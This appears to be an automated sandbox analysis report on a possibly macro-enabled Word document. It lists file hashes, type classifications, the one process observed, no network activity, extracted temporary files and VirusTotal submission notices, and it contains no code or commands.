- 3135956e280e61d44f42928899dcb3b0105fb35b53b33f85eaa41bc0ad879d83.doc
- Size
- 736KiB (753571 bytes)
- Type
- docx office
- Description
- Microsoft OOXML
- Architecture
- WINDOWS
- SHA256
- c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de
- MD5
- 2f820c69716a98e91fb826ac6c4fe4df
- SHA1
- c457ce1cc07dc55c072cfb5537f1fcbf96e3eca0
Classification (TrID)
- 59.4% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 36.0% (.DOCX) Word Microsoft Office Open XML Format document
- 4.5% (.ZIP) ZIP compressed archive
Hybrid Analysis
Analysed 1 process in total (System Resource Monitor).
- WINWORD.EXE /n "C:\c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc (PID: 2500)
Network Analysis
DNS Requests
No relevant DNS requests were made.
Contacted Hosts
No relevant hosts were contacted.
HTTP Traffic
No relevant HTTP requests were made.
Extracted Strings
Extracted Files
-
Informative 11
-
c93ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.LNK
- Size
- 733B (733 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jul 20 20:04:29 2017, mtime=Thu Jul 20 20:04:29 2017, atime=Thu Jul 20 20:04:35 2017, length=753571, window=hide
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 759323c00b7fff36d55f7aa51be3eac8
- SHA1
- 5277b8a52f76d4af467d9c3602bb4f1fadefff92
- SHA256
- b0b585cc6c3f3f926c21f6a66a20dd1af1111dd0238560b9f371c73721da8831
index.dat
- Size
- 257B (257 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5d7f54bdba2b6ea2b60e5a16cc066550
- SHA1
- fb7f2b8a900ca848ff7394b1aa2cc042d482ead7
- SHA256
- b45e229bf333be51b9441c8e78ab95a2a2b6fa2f706194c3dfc4dba47229eddc
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5054e44c674bbaf06c5b6212b8cb9e46
- SHA1
- 245e34cdc49b49494b1b5c68a531111b314a6850
- SHA256
- 3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db
~WRS{7E8CC096-A89B-4BC4-BC24-67EEADE93A4E}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 25600, next free block index 1140850688
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 6d00e84e5edaa43e119ea03ce5ecaa4f
- SHA1
- 9fa7d5d09fed0a7c1f8392022eaaa24b66f4e77b
- SHA256
- 957da89085d8855135307e641a71c5ea2284be478c115d7a6c3e9c095e83d407
~WRS{9A69F611-DBEE-4B09-9F46-93EB686093F6}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5d4d94ee7e06bbb0af9584119797b23a
- SHA1
- dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
- 4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
~WRS{B5BB78FE-9788-442F-B0CC-7A91197C7A2F}.tmp
- Size
- 1.5KiB (1536 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5278c0ca47d64764a2a23724d1f4045b
- SHA1
- 43f07600b7b2c1bab3c82df5981e31603401cdb5
- SHA256
- b7d25cc08b7ef1e440f773a5344de8076c262a9a9fded523e68b4cf0c51e68e4
~WRS{E05C6FEE-AB1B-4EC4-BEC2-62F2BFCBAA59}.tmp
- Size
- 1.5MiB (1537584 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- d7bb49bbca7863913b88262094cb8dc8
- SHA1
- a84ff2bd05d15deca4c88f92c453b33de13d61dc
- SHA256
- ad7a87bf643eae98c7467c413f85e5dc7f49cc2d61c6584ccedacc06f8062630
msoF72F.tmp
- Size
- 663B (663 bytes)
- Type
- img image
- Description
- GIF image data, version 89a, 15 x 15
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- ed3c1c40b68ba4f40db15529d5443dec
- SHA1
- 831af99bb64a04617e0a42ea898756f9e0e0bcca
- SHA256
- 039fe79b74e6d3d561e32d4af570e6ca70db6bb3718395be2bf278b9e601279a
~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 2500)
- MD5
- 5054e44c674bbaf06c5b6212b8cb9e46
- SHA1
- 245e34cdc49b49494b1b5c68a531111b314a6850
- SHA256
- 3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db
~WRD0001.tmp
- Size
- 1.1MiB (1179648 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- MD5
- 66cf03de6d6bfd7e5b4a8a71eb6c8b00
- SHA1
- 83886c015e8054cdda82e5894eeffce81c6ec512
- SHA256
- 022a721680cf319bb241c457e16bf937d9fd227c0e8abf9deb996ca50c5c1892
MSO1045.acl
- Size
- 30B (30 bytes)
- Type
- data
- MD5
- f022bceadff0c8b2c8ce38f19c27f494
- SHA1
- a66d99d484fee1db9dc704fa84e03de3f32bcf8b
- SHA256
- c8b01f5f6dc0c065c7d6bdfb0654a9f293651783db31bd86706e56ea7a7b839e
Notifications
Runtime
- Added comment to Virus Total report
- Extracted file "~$3ded271774e68f926ce8876f6e749df29d3301459fe08996304d2390cbd0de.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/3269e03bc22e27936002358fc4845bf4b93ab99df6d5a6fa7767f557dc45d6db/analysis/1500581474/")
- Extracted file "~WRD0001.tmp" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/022a721680cf319bb241c457e16bf937d9fd227c0e8abf9deb996ca50c5c1892/analysis/1500581478/")
- Not all sources for signature ID "api-55" are available in the report
- Not all sources for signature ID "registry-25" are available in the report
- Not all sources for signature ID "registry-55" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)